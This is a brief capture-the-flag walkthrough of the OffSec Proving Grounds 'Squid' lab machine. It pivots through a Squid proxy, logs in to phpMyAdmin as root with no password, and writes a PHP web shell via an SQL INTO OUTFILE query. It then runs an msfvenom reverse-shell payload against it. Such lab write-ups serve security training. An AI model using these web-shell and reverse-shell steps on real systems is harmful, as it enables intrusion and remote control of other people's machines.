title | layout | date | tag | writeups | hidden | author | description | ||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Proving grounds Practice: Squid |
post |
2023-08-20 06:00 |
|
true |
true |
Naveen |
Offsec proving grounds practice windows machine writeup |
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
Squid http proxy service running on PORT 3128. Use Squid Pivoting Open Port Scanner to perform PORT scanning.
Configure the proxy server IP
and PORT
in the browser to access the webserver running on PORT 8080.
System Information
PHPMyadmin
Login with username root
and password as null
.
Execute below sql query to create reverse shell.
SELECT "<?php system($_GET['cmd'])?>" INTO OUTFILE "C:/wamp/www/shell2.php"
As shown in the phpinfo() page the document root folder is C:/wamp/www
. So the shell will be publicly accessible at http://192.168.237.189:8080/shell2.php
.
http://192.168.237.189:8080/shell2.php?cmd=whoami
msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=1234 -o mshell.exe
Use curl to download the shell in to the attacking machine. Run a nc
llisterner and execute the reverse shell by visiting http://192.168.237.189:8080/shell2.php?cmd=mshell.exe
Reverse shell obtained.
Thanks for reading!
For more insights and updates, follow me on Twitter: @thevillagehacker.